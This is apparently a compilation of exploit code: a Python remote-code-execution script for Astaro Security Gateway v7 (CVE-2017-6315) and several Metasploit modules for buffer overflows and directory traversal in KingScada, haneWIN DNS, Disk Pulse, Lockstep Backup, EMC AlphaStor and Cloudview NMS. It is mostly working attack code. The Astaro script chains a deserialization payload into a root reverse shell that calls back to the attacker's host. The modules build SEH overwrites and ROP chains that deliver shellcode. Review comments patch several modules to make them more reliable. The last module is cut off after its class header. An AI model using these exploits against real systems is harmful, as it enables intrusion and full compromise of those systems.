
#!/usr/bin/python

# Astaro Security Gateway v7 - Unauthenticated Remote Code Execution
# Exploit Authors: Jakub Palaczynski and Maciej Grabiec
# Tested on versions: 7.500 and 7.506
# Date: 13.12.2016
# Vendor Homepage: https://www.sophos.com/
# CVE: CVE-2017-6315

import os
import select
import socket
import subprocess
import sys
import threading
import time

# print help or assign arguments
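# Argument handling: exactly two positional arguments are required.
#   our_ip          - address the gateway can reach us on (ports 80 and 443
#                     are opened on it below, so this usually needs root)
#   remote_ip:port  - the vulnerable ASG v7 WebAdmin endpoint
# Anything else prints the usage text to stderr and exits with status 1.
if len(sys.argv) != 3:
    sys.stderr.write("[-]Usage: python %s <our_ip> <remote_ip:port>\n" % sys.argv[0])
    # "Exemple" typo in the original usage text fixed
    sys.stderr.write("[-]Example: python %s 192.168.1.1 192.168.1.2:4444\n" % sys.argv[0])
    sys.exit(1)

lhost = sys.argv[1]  # our ip address
rhost = sys.argv[2]  # ip address and port of vulnerable ASG v7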

# for additional thread to send requests in parallel
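# for additional thread to send requests in parallel
class requests (threading.Thread):
    """Background thread that fires the two HTTPS requests which make the
    gateway's index.plx connect back to our listener.

    Both POSTs point ``backend_address`` at us.  Per the original author's
    comment the first one (port 81) clears the gateway's cached backend; the
    second (port 80) makes it connect to the stage-1 listener opened by the
    main thread.  The thread sleeps 5 s first so that listener is already up.

    NOTE(review): the class name shadows the popular ``requests`` library;
    it is kept because the rest of the script refers to it by this name.
    """

    @staticmethod
    def _curl_command(target, backend, timeout):
        """Return the curl argv for one trigger request.

        The command is an argument list, not a shell string, so the values
        taken from argv are never interpreted by a shell (the original did
        ``os.system('curl ... ' + rhost + ...)``).  ``-k`` disables
        certificate verification -- presumably the appliance uses a
        self-signed certificate.

        Parameters:
            target:  "host:port" of the gateway.
            backend: "host:port" to plant as backend_address.
            timeout: curl -m value in seconds.
        """
        return [
            'curl', '-s', '-m', str(timeout), '-X', 'POST',
            'https://' + target + '/index.plx',
            '-d', '{"objs": [{"FID": "init"}],"backend_address": "' + backend + '"}',
            '-k',
        ]

    def run(self):
        print('Sending requests to trigger vulnerability.')
        time.sleep(5)
        # curl's stdout is discarded, as the original's "> /dev/null" did
        with open(os.devnull, 'wb') as devnull:
            # first request to clear cache
            subprocess.call(self._curl_command(rhost, lhost + ':81', 5), stdout=devnull)
            # second request to trigger reverse connection
            subprocess.call(self._curl_command(rhost, lhost + ':80', 20), stdout=devnull)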

# function that creates socket
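def create_socket(port):
    """Listen on ``port`` on all interfaces and block until one client connects.

    Returns ``(sock, conn, addr)``: the listening socket, the accepted
    connection and the peer address.  The caller owns both sockets.  The
    ports this script uses (80 and 443) are privileged on most systems.

    NOTE(review): the first peer to connect is accepted -- it is not checked
    against rhost -- so run this on an isolated segment, not a shared LAN.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # the same port is reused for three consecutive stages; without
        # SO_REUSEADDR the rebind would fail while the old socket lingers
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('0.0.0.0', port))
        sock.listen(10)
        conn, addr = sock.accept()
    except Exception:
        # the original leaked the listener if bind/listen/accept raised
        sock.close()
        raise
    return sock, conn, addr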

# function to receive data from socket
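def receive(conn, timeout=0.5):
    """Print whatever the remote shell sends back for the last command.

    Blocks for the first chunk, then keeps reading while more data arrives
    within ``timeout`` seconds; stops on EOF.  The original read exactly two
    1024-byte chunks, which hangs when the reply fits in one segment and
    truncates when it needs more than two.

    Parameters:
        conn:    connected socket to the reverse shell.
        timeout: seconds to wait for further output after the first chunk.
    """
    chunk = conn.recv(1024)
    while chunk:
        # recv() returns bytes on Python 3 and str on Python 2
        if not isinstance(chunk, str):
            chunk = chunk.decode('utf-8', 'replace')
        sys.stdout.write(chunk)
        sys.stdout.flush()
        ready, _, _ = select.select([conn], [], [], timeout)
        if not ready:
            break
        chunk = conn.recv(1024)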

# Thanks to Agarri: http://www.agarri.fr/docs/PoC_thaw_perl58.pl
# This Perl script produces a serialized (Storable) object that, once thawed on the gateway, makes a reverse connection and evals everything it receives on that socket
file = """
#!/usr/bin/perl

use strict;
use MIME::Base64 qw( encode_base64 );
use Storable qw( nfreeze );
use LWP::UserAgent;

my $package_name = "A" x 252;
my $pack = qq~{ package $package_name; sub STORABLE_freeze { return 1; } }~;
eval($pack);

my $payload = qq~POSIX;eval('sleep(10);use IO::Socket::INET;\$r=IO::Socket::INET->new(\"""" + lhost + """:443");if (\$r) {eval(<\$r>);}');exit;~;

my $padding = length($package_name) - length($payload);
$payload = $payload . (";" x $padding);
my $data = bless { ignore => 'this' }, $package_name;
my $frozen = nfreeze($data);
$frozen =~ s/$package_name/$payload/g;
my $encodedSize = length($frozen);
my $pakiet = print(pack("N", $encodedSize), $frozen);
print "$frozen";
"""

# save file, run perl script and save our serialized payload
f = open("payload.pl", "w")
f.write(file)
f.close()

serialized = os.popen("perl ./payload.pl").read()
os.remove("./payload.pl")

# start thread that sends requests
thread = requests()
thread.start()

# open socket that receives connection from index
sock, conn, addr = create_socket(80)
print 'Received connection from: ' + addr[0] + ':' + str(addr[1]) + '.'
print 'Sending 1st stage payload.'
data = conn.recv(256)
# say hello to RPC client
conn.sendall(data)
data = conn.recv(256)
# send serialized object that initiates connect back connection and executes everything what it receives on a socket
conn.sendall(serialized)
sock.close()

# create second socket that receives connection from index and sends additional commands
sock, conn, addr = create_socket(443)
print 'Sending 2nd stage payload.'
# send commands that exploit confd (running with root permissions) which is running on localhost - the same exploitation as for first stage
conn.sendall('sleep(10);use IO::Socket::INET;my $s = new IO::Socket::INET(PeerHost => "127.0.0.1",PeerPort => "4472",Proto => "tcp");$s->send("\\x00\\x00\\x00\\x1d\\x05\\x06\\x02\\x00\\x00\\x00\\x04\\x0a\\x04\\x70\\x72\\x70\\x63\\x0a\\x04\\x30\\x2e\\x30\\x31\\x0a\\x06\\x73\\x79\\x73\\x74\\x65\\x6d\\x0a\\x00");my $a;$s->recv($a,1024);$s->send("' + "\\x" + "\\x".join("{:02x}".format(ord(c)) for c in serialized) + '");$s->recv($a,1024);$s->close();\n')
sock.close()

# create socket that receives connection from confd and sends commands to get reverse shell
sock, conn, addr = create_socket(443)
print 'Sending 3rd stage payload.'
# send reverse shell payload
conn.sendall('sleep(20);use Socket;$i="' + lhost + '";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\n')
sock.close()

# create socket to receive shell with root permissions
print '\nNow you need to wait for shell.'
sock, conn, addr = create_socket(443)
receive(conn)
while True:
    cmd = raw_input("")
    if cmd == 'exit':
        break
    else:
        conn.send(cmd + "\n")
        receive(conn)
sock.close()

            
require 'msf/core'

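class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cloudview NMS 2.00b Writable Directory Traversal Execution",
      'Description'    => %q{
        This module exploits a vulnerability found in Cloudview NMS server.  The
        software contains a directory traversal vulnerability that allows a remote
        attacker to write arbitrary file to the file system, which results in
        code execution under the context 'SYSTEM'.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'james fitts' ],
      'References'     =>
        [
          # no public advisory was available when this module was written
          ['URL', '0day']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'DefaultOptions'  =>
        {
          'ExitFunction' => "none"
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ ' Cloudview NMS 2.00b on Windows', {} ]
        ],
      # the payload runs as SYSTEM (see Description), so the session is
      # privileged; the original said false here
      'Privileged'     => true,
      'DisclosureDate' => "Oct 13 2014",
      'DefaultTarget'  => 0))

    register_options([
      OptInt.new('DEPTH', [ false, "Levels to reach base directory", 5 ]),
      OptAddress.new('RHOST', [ true, "The remote TFTP server address" ]),
      OptPort.new('RPORT', [ true, "The remote TFTP server port", 69 ]),
      OptInt.new('TIMEOUT', [ true, "Seconds to wait for each TFTP transfer to finish", 30 ])
    ], self.class)
  end

  # Push +data+ to +filename+ on the target over TFTP (WRQ, octet mode).
  #
  # The client does the transfer in its own thread; we poll until it reports
  # completion or TIMEOUT seconds have elapsed, and only then stop it.  The
  # original called tftp_client.stop inside the polling loop, i.e. one
  # second after the write request went out, which looks like it tears the
  # client down before a transfer the size of the .exe can finish -- TODO
  # confirm against Rex::Proto::TFTP::Client#stop.
  def upload(filename, data)
    tftp_client = Rex::Proto::TFTP::Client.new(
      "LocalHost"  => "0.0.0.0",
      "LocalPort"  => 1025 + rand(0xffff-1025),
      "PeerHost"   => datastore['RHOST'],
      "PeerPort"   => datastore['RPORT'],
      "LocalFile"  => "DATA:#{data}",
      "RemoteFile" => filename,
      "Mode"       => "octet",
      "Context"    => {'Msf' => self.framework, "MsfExploit" => self },
      "Action"     => :upload
    )

    tftp_client.send_write_request { |msg| print_status(msg) }

    deadline = Time.now + datastore['TIMEOUT']
    until tftp_client.complete
      if Time.now > deadline
        tftp_client.stop
        fail_with(Failure::TimeoutExpired, "#{datastore['RHOST']}:#{datastore['RPORT']} - TFTP upload of #{filename} timed out")
      end
      select(nil, nil, nil, 1)
    end
    tftp_client.stop
  end

  # Write the payload .exe into system32, then a .mof into wbem\mof; this
  # is the WbemExec mixin's technique (WMI compiles dropped .mof files and
  # the generated .mof launches the .exe), which is what yields SYSTEM.
  def exploit
    peer = "#{datastore['RHOST']}:#{datastore['RPORT']}"

    exe_name = rand_text_alpha(rand(10)+5) + '.exe'
    exe      = generate_payload_exe
    mof_name = rand_text_alpha(rand(10)+5) + '.mof'
    mof      = generate_mof(mof_name, exe_name)

    # DEPTH unset or 0 means "traverse ten levels"; the option default is 5
    depth  = (datastore['DEPTH'].nil? || datastore['DEPTH'] == 0) ? 10 : datastore['DEPTH']
    levels = "../" * depth

    print_status("#{peer} - Uploading executable (#{exe.length} bytes)")
    upload("#{levels}WINDOWS\\system32\\#{exe_name}", exe)

    select(nil, nil, nil, 1)

    print_status("#{peer} - Uploading .mof...")
    upload("#{levels}WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
  end
end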

            
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Module metadata.  The request is 5000 bytes; the third dword (offset 8)
	# is taken by AEserver.exe as a memcpy() length, which is what overflows
	# the stack buffer (see Description).
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'KingScada AlarmServer Stack Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack based buffer overflow found in
				KingScada < 3.1.2.13. The vulnerability is triggered when 
				sending a specially crafted packet to the 'AlarmServer' 
				(AEserver.exe) service listening on port 12401. During the
				parsing of the packet the 3rd dword is used as a size value
				for a memcpy operation which leads to an overflown stack buffer
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2014-0787' ],
					[ 'ZDI', '14-071' ],
					[ 'URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-098-02' ]
				],
			'Privileged'     => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0a\x0d\x20",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'DisclosureDate' => 'Apr 10, 2014',
			'DefaultTarget'  => 0,
			'Targets'        =>
				[
					[
						# NOTE(review): "31.1.1.4" does not look like a KingScada version
						# (Description says < 3.1.2.13); probably a typo for 3.1.1.4 -- verify.
						'Windows XP SP3 EN / WellinTech KingScada 31.1.1.4',
							{
								# dbghelp.dll
								# pop esi/ pop edi/ retn
								'ret' => 0x02881fbf,
							}
					],
				]))

		register_options([Opt::RPORT(12401)], self.class)
	end

	# Build the 5000-byte request: a NOP sled with the three header dwords at
	# the front, the shellcode at 1128, the SEH record at 2128 and, right
	# behind it, a backward jump into the sled so execution slides into the
	# shellcode.  Then send it and wait for the session.
	def exploit
		connect

		shellcode = payload.encoded

		request = make_nops(5000)
		writes = [
			[0,    [0x000004d2].pack('V')],
			[4,    [0x0000007b].pack('V')],
			[8,    [0x0000133c].pack('V')],               # size for memcpy()
			[1128, shellcode],
			[2128, generate_seh_record(target['ret'])],  # nSEH + handler (pop/pop/ret)
			[2136, "\xe9\x4b\xfb\xff\xff"],              # jmp $-1200: lands at 936, inside the sled
		]
		writes.each { |offset, bytes| request[offset, bytes.length] = bytes }

		print_status("Trying target #{target.name}...")

		sock.put(request)

		handler
		disconnect
	end

end

            
require 'msf/core'

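class MetasploitModule < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Module metadata.  The first two bytes of the request are read as a
	# length (0x4e20) by the server; the rest is the oversized body that the
	# unbounded memcpy() described below copies onto the stack.
	def initialize(info = {})
		super(update_info(info,
			'Name'		=> 'haneWIN DNS Server Buffer Overflow',
			'Description'	=> %q{
				This module exploits a buffer overflow vulnerability found in
				haneWIN DNS Server <= 1.5.3. The vulnerability is triggered
				by sending an overly long packet to the victim server. A memcpy
				function blindly copies user supplied data to a fixed size buffer
				leading to remote code execution. 

				This module was tested against haneWIN DNS 1.5.3
			},
			'Author' => [ 'james fitts' ],
			'License' => MSF_LICENSE,
			'References' =>
				[
					[ 'EDB', '31260' ],
					[ 'OSVDB', '102773' ]
				],
			'Privileged'  => false,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload' =>
				{
					# The shellcode goes at offset 1332 behind a 32-byte NOP pad and
					# the SEH record is written at 2324, so 2324 - 1332 - 32 = 960
					# bytes are free.  The original advertised 1000, which let a
					# large payload be clobbered by the SEH record and the jump
					# written after it.
					'Space'	=> 960,
					'DisableNops' => true,
					'BadChars' => "\x00\x0a\x0d\x20",
					'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
				},
			'Platform' => 'win',
			'DefaultTarget'	=> 0,
			'Targets' =>
				[
					[
						'Windows 2000 SP4 EN / haneWIN DNS 1.5.3',
						{
							# msvcrt.dll v6.10.9844.0
							# pop esi/ pop edi/ retn
							'Ret' => 0x78010394,
						}
					]
				],
			'DisclosureDate' => 'Jul 27 2013'))

			register_options([Opt::RPORT(53)], self.class)
	end

	# Send the 5000-byte request and wait for the payload to connect back.
	def exploit
		connect

		# the 32-byte NOP pad gives the backward jump below a safe landing zone
		p = make_nops(32) + payload.encoded

		buf = Rex::Text.pattern_create(5000)
		buf[0, 2] = [0x4e20].pack('n')							# length for malloc
		buf[1332, p.length] = p
		buf[2324, 8] = generate_seh_record(target.ret)
		# jmp $-1000: the jump sits at 2342, so it lands at 1342, inside the NOP pad
		buf[2332, 15] = make_nops(10) + "\xe9\x13\xfc\xff\xff"

		print_status("Sending malicious request...")
		sock.put(buf)

		# wait for the session as the sibling modules do; the original went
		# straight to disconnect
		handler
		disconnect

	end
end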

            
require 'msf/core'

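class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Module metadata.  Request layout (offsets from the start of the data):
	#   0    "GetServerInfo"
	#   13   8 x 0x41 (inc ecx) pad
	#   21   shellcode, then 0x42 filler up to Offset (303) bytes after the pad start
	#   316  SEH record (pop/pop/ret in libspp.dll)
	#   324  4 NOPs + jmp $-311 back into the 0x41 pad
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Disk Pulse Server \'GetServerInfo\' Buffer Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow vulnerability found
					in libpal.dll of Disk Pulse Server v2.2.34. The overflow
					is triggered when sending an overly long 'GetServerInfo'
					request to the service listening on port 9120.
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'BID', '43919' ],
					[ 'URL', 'http://www.saintcorporation.com/cgi-bin/exploit_info/disk_pulse_getserverinfo' ],
					[ 'URL', 'http://www.coresecurity.com/content/disk-pulse-server-getserverinfo-request-buffer-overflow-exploit-10-5' ]
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					# Only Offset - 8 = 295 bytes lie between the 0x41 pad and the
					# SEH record.  The original said 300, so a payload between 296
					# and 300 bytes made the filler length negative and the module
					# raise instead of sending anything.
					'Space' => 295,
					'BadChars' => "\x00\x0a\x0d\x20",
					'DisableNops' => true,
					'StackAdjustment' => -3500,
					'Compat'	=>
						{
							'SymbolLookup' => 'ws2ord',
						}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows XP SP3 EN',
							{
								# p/p/r
								# libspp.dll
								'Ret' => 0x1006f71f,
								'Offset' => 303
							}
					],
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Oct 19 2010'))

		register_options([Opt::RPORT(9120)], self.class)
	end

	# Build and send the overlong GetServerInfo request, then wait for the
	# session.
	def exploit
		connect

		shellcode = payload.encoded
		offset    = target['Offset']   # bytes from the 0x41 pad to the SEH record (original hard-coded 303)

		filler = offset - (8 + shellcode.length)
		# 'Space' is derived from Offset so this cannot go negative; the check
		# makes a future mismatch fail with a clear message instead of an
		# ArgumentError from String#*
		fail_with(Failure::BadConfig, "payload (#{shellcode.length} bytes) does not fit in #{offset - 8} bytes") if filler < 0

		sploit =  "GetServerInfo"
		sploit << "\x41" * 8
		sploit << shellcode
		sploit << "\x42" * filler
		sploit << generate_seh_record(target.ret)
		sploit << make_nops(4)
		# jmp $-311: from 328 this lands at 17, four bytes into the 0x41 pad
		# (inc ecx x4), and falls through into the shellcode at 21
		sploit << "\xe9\xc4\xfe\xff\xff"
		sploit << rand_text_alpha_upper(200)

		print_status("Trying target #{target.name}...")

		sock.put(sploit)

		handler
		disconnect
	end

end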
__END__
0033C05C   55               PUSH EBP
0033C05D   8B6C24 1C        MOV EBP,DWORD PTR SS:[ESP+1C]
0033C061   3AC2             CMP AL,DL
0033C063   74 14            JE SHORT libpal.0033C079
0033C065   3C 0D            CMP AL,0D
0033C067   74 10            JE SHORT libpal.0033C079
0033C069   3C 0A            CMP AL,0A
0033C06B   74 0C            JE SHORT libpal.0033C079
0033C06D   41               INC ECX
0033C06E   88042F           MOV BYTE PTR DS:[EDI+EBP],AL
0033C071   47               INC EDI
0033C072   8A0431           MOV AL,BYTE PTR DS:[ECX+ESI]
0033C075   84C0             TEST AL,AL
0033C077  ^75 E8            JNZ SHORT libpal.0033C061
0033C079   C6042F 00        MOV BYTE PTR DS:[EDI+EBP],0
0033C07D   5D               POP EBP
0033C07E   5F               POP EDI
0033C07F   890B             MOV DWORD PTR DS:[EBX],ECX
0033C081   5E               POP ESI
0033C082   B8 01000000      MOV EAX,1
0033C087   5B               POP EBX
0033C088   C3               RETN

            
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	# Module metadata.  The payload is alphanumeric-encoded (upper case) and
	# the encoder is told the shellcode address is in ECX, which the getPC
	# stub in PrependEncoder provides.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Lockstep Backup for Workgroups <= 4.0.3',
			'Description'    => %q{
				This module exploits a stack buffer overflow found in
				Lockstep Backup for Workgroups <= 4.0.3. The vulnerability
				is triggered when sending a specially crafted packet that
				will cause a login failure.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					[ 'URL', 'http://secunia.com/advisories/50260/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'	=> 1000,
					'BadChars' => "\x00",
					# getPC stub: jmp +3 / pop ecx / jmp +5 / call -8 leaves the
					# address of the bytes that follow in ecx
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'EncoderType'   => Msf::Encoder::Type::AlphanumUpper,
					'EncoderOptions' =>
						{
							'BufferRegister' => 'ECX',
						},
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows 2000 ALL EN',
							{
								# msvcrt.dll
								# pop ecx/ pop ecx/ retn
								'Ret' => 0x780146c0,
							}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 11 2013'))

		register_options(
			[
				Opt::RPORT(2125),
				OptString.new('USERNAME', [ true, 'Username of victim', 'msf' ])
			], self.class )
	end

	# Build the 10000-byte login request ("BFWCA" header, NUL-terminated
	# username, shellcode at 73, SEH record at 7197) and send it.
	def exploit
		connect

		uname = datastore['USERNAME']

		p =  "\x90" * 16
		p << payload.encoded

		packet = rand_text_alpha_upper(10000)
		packet[0, 8] = "BFWCA\x01\x01\x00"
		# NOTE(review): the slice is uname.length wide but the value is one
		# byte longer (the NUL), so String#[]= grows the packet by one byte
		# here.  Every later write uses an absolute offset, so only filler
		# shifts; left as is because this is the layout that was tested.  A
		# USERNAME longer than 64 bytes would be overwritten by the NOP pad
		# placed at 73.
		packet[8, uname.length] = "#{uname}\x00"
		packet[73, p.length] = p
		# SEH record: nSEH is a short jump over the handler address into the
		# NOPs behind it; the handler is the pop/pop/ret from the target
		packet[7197, 4] = "\xeb\x06\x90\x90"		# jmp $+8
		packet[7201, 4] = [target.ret].pack('V')
		packet[7205, 8] = "\x90" * 8
		# jmp edi: edi is assumed to point at the shellcode at this point --
		# presumably a property of the crashing frame; not established here
		packet[7213, 2] = "\xff\xe7"			# jmp edi

		print_status("Trying target %s..." % target.name)

		sock.put(packet)

		handler
		disconnect
	end

end

            
require 'msf/core'

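class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	# Module metadata.  The request is the opcode byte 0x72 followed by a
	# 550-byte body; the unbounded sprintf() described below copies it over
	# the saved return address.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC AlphaStor Device Manager Opcode 0x72',
			'Description'    => %q{
				This module exploits a stack based buffer overflow vulnerability
				found in EMC Alphastor Device Manager. The overflow is triggered
				when sending a specially crafted packet to the rrobotd.exe service
				listening on port 3000. During the copying of strings to the stack
				an unbounded sprintf() function overwrites the return pointer
				leading to remote code execution.
			},
			'Author'         => [ 'James Fitts' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: $',
			'References'     =>
				[
					# no public advisory was available when this module was written
					[ 'URL', '0day' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space' => 160,
					'DisableNops' => true,
					'BadChars' => "\x00\x09\x0a\x0d",
					'StackAdjustment' => -404,
					# getPC stub: jmp +3 / pop ecx / jmp +5 / call -8 leaves the
					# address of the bytes that follow in ecx
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'	=>
					{
						# 'ws2ord' is a SymbolLookup value (the Library Manager
						# module for the same product uses it that way).  The
						# original listed it under ConnectionType, which is not a
						# connection type and would likely leave no compatible
						# payload selectable.
						'SymbolLookup' => 'ws2ord',
					}
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[
						'Windows Server 2003 SP2 EN',
							{
								# pop eax/ retn
								# msvcrt.dll
								'Ret' => 0x77bc5d88,
							}
					],
				],
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 14 2013'))

		register_options(
			[
				Opt::RPORT(3000)
			], self.class )
	end

	# Build the opcode 0x72 request (ROP chain + shellcode) and send it.
	def exploit
		connect

		shellcode = payload.encoded

		# msvcrt.dll (Windows Server 2003 SP2) ROP chain, 24 dwords = 96 bytes.
		# Per the gadget comments it fetches the kernel32!VirtualProtect
		# pointer, arranges the remaining registers and finishes with pushad;
		# the exact argument values are not documented here and the chain is
		# unchanged from the original.
		rop = [
			0x77bb2563,	# pop eax/ retn
			0x77ba1114,	# ptr to kernel32!virtualprotect
			0x77bbf244,	# mov eax, dword ptr [eax]/ pop ebp/ retn
			0xfeedface,
			0x77bb0c86,	# xchg eax, esi/ retn
			0x77bc9801,	# pop ebp/ retn
			0x77be2265,
			0x77bb2563,	# pop eax/ retn
			0x03C0990F,
			0x77bdd441,	# sub eax, 3c0940fh/ retn
			0x77bb48d3,	# pop eax/ retn
			0x77bf21e0,
			0x77bbf102,	# xchg eax, ebx/ add byte ptr [eax], al/ retn
			0x77bbfc02,	# pop ecx/ retn
			0x77bef001,
			0x77bd8c04,	# pop edi/ retn
			0x77bd8c05,
			0x77bb2563,	# pop eax/ retn
			0x03c0984f,
			0x77bdd441,	# sub eax, 3c0940fh/ retn
			0x77bb8285,	# xchg eax, edx/ retn
			0x77bb2563,	# pop eax/ retn
			0x90909090,
			0x77be6591,	# pushad/ add al, 0efh/ retn
		].pack("V*")

		# 550-byte body filled with 0xcc (int3).  target.ret (pop eax/retn) at
		# 246 is presumably the overwritten return address; the dword at 250
		# is what that pop consumes, the chain follows at 254 and the
		# shellcode at 350 (200 bytes available for 'Space' => 160).
		# NOTE(review): 0x77bf6f80 is not annotated in the original -- an
		# msvcrt.dll address by its range; TODO confirm what it is.
		buf = "\xcc" * 550
		buf[246, 4] = [target.ret].pack('V')
		buf[250, 4] = [0x77bf6f80].pack('V')
		buf[254, rop.length] = rop
		buf[350, shellcode.length] = shellcode

		packet = "\x72#{buf}"   # opcode 0x72, then the body

		print_status("Trying target %s..." % target.name)

		sock.put(packet)

		handler
		disconnect
	end

end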

            
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

	include Msf::Exploit::Remote::Tcp

	# Module metadata.  The request is opcode 0x4f ("O") followed by a
	# 514-byte body with several stack-pivot gadgets, a ROP chain and the
	# shellcode; two strcpy() calls with unchecked pointers (see
	# Description) are what smash the stack.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'EMC AlphaStor Library Manager Opcode 0x4f',
			'Description'    => %q{
				This module exploits a stack based buffer overflow found in EMC
				Alphastor Library Manager version < 4.0 build 910. The overflow
				is triggered due to a lack of sanitization of the pointers used
				for two strcpy functions.
			},
			'Author'         => [ 'james fitts' ],
			'License'        => MSF_LICENSE,
			'References'     =>
				[
					[ 'CVE', '2013-0946' ],
					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-14-029/' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
					'wfsdelay'	=>	1000
				},
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'	=> 160,
					'DisableNops'	=> 'true',
					'BadChars' => "\x00\x09\x0a\x0d",
					'StackAdjustment' => -404,
					# getPC stub: jmp +3 / pop ecx / jmp +5 / call -8 leaves the
					# address of the bytes that follow in ecx
					'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
					'Compat'        =>
						{
							'SymbolLookup' => 'ws2ord',
						},
				},
			'Platform'       => 'win',
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Feb 13 2014',
			'Targets'        =>
				[
					[
						'Windows Server 2003 SP2 EN',
							{
								# msvcrt.dll
								# add esp, 0c/ retn
								'Ret' => 0x77bdda70,
							}
					],
				]))

		register_options(
			[
				Opt::RPORT(3500)
			], self.class )
	end

	# Assemble the opcode 0x4f request from a table of (offset, bytes) writes
	# over a 514-byte pattern, append the trailing junk and send it.
	def exploit
		connect

		shellcode = "\x90" * 8
		shellcode << payload.encoded

		# msvcrt.dll (Windows Server 2003 SP2) ROP chain, 24 dwords = 96 bytes.
		# Per the gadget comments it fetches the kernel32!VirtualProtect
		# pointer, arranges the remaining registers and finishes with pushad;
		# the exact argument values are not documented here.
		rop = [
			0x77bb2563,	# pop eax/ retn
			0x77ba1114,	# ptr to kernel32!virtualprotect
			0x77bbf244,	# mov eax, dword ptr [eax]/ pop ebp/ retn
			0xfeedface,
			0x77bb0c86,	# xchg eax, esi/ retn
			0x77bc9801,	# pop ebp/ retn
			0x77be2265,
			0x77bb2563,	# pop eax/ retn
			0x03C0990F,
			0x77bdd441,	# sub eax, 3c0940fh/ retn
			0x77bb48d3,	# pop eax/ retn
			0x77bf21e0,
			0x77bbf102,	# xchg eax, ebx/ add byte ptr [eax], al/ retn
			0x77bbfc02,	# pop ecx/ retn
			0x77bef001,
			0x77bd8c04,	# pop edi/ retn
			0x77bd8c05,
			0x77bb2563,	# pop eax/ retn
			0x03c0984f,
			0x77bdd441,	# sub eax, 3c0940fh/ retn
			0x77bb8285,	# xchg eax, edx/ retn
			0x77bb2563,	# pop eax/ retn
			0x90909090,
			0x77be6591,	# pushad/ add al, 0efh/ retn
		].pack("V*")

		request = Rex::Text.pattern_create(514)
		writes = [
			[0,   "O~"],                          # opcode
			[13,  [0x77bdf444].pack('V')],        # stack pivot 52
			[25,  [target.ret].pack('V')],        # stack pivot 12
			[41,  [0x77bdf444].pack('V')],        # stack pivot 52
			[57,  [0x01167e20].pack('V')],        # ptr
			[69,  rop],
			[165, [0x909073eb].pack('V')],        # jmp $+117 (lands at 282, the shellcode) + 2 nops
			[278, [0x0116fd59].pack('V')],        # ptr
			[282, shellcode],
			[512, "\x00"],                        # terminator
		]
		writes.each { |offset, bytes| request[offset, bytes.length] = bytes }

		# junk
		request << "AAAABBBBCCCCDDDD"

		print_status("Trying target %s..." % target.name)

		sock.put(request)

		handler
		disconnect
	end

end

            
require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
	Rank = GreatRanking

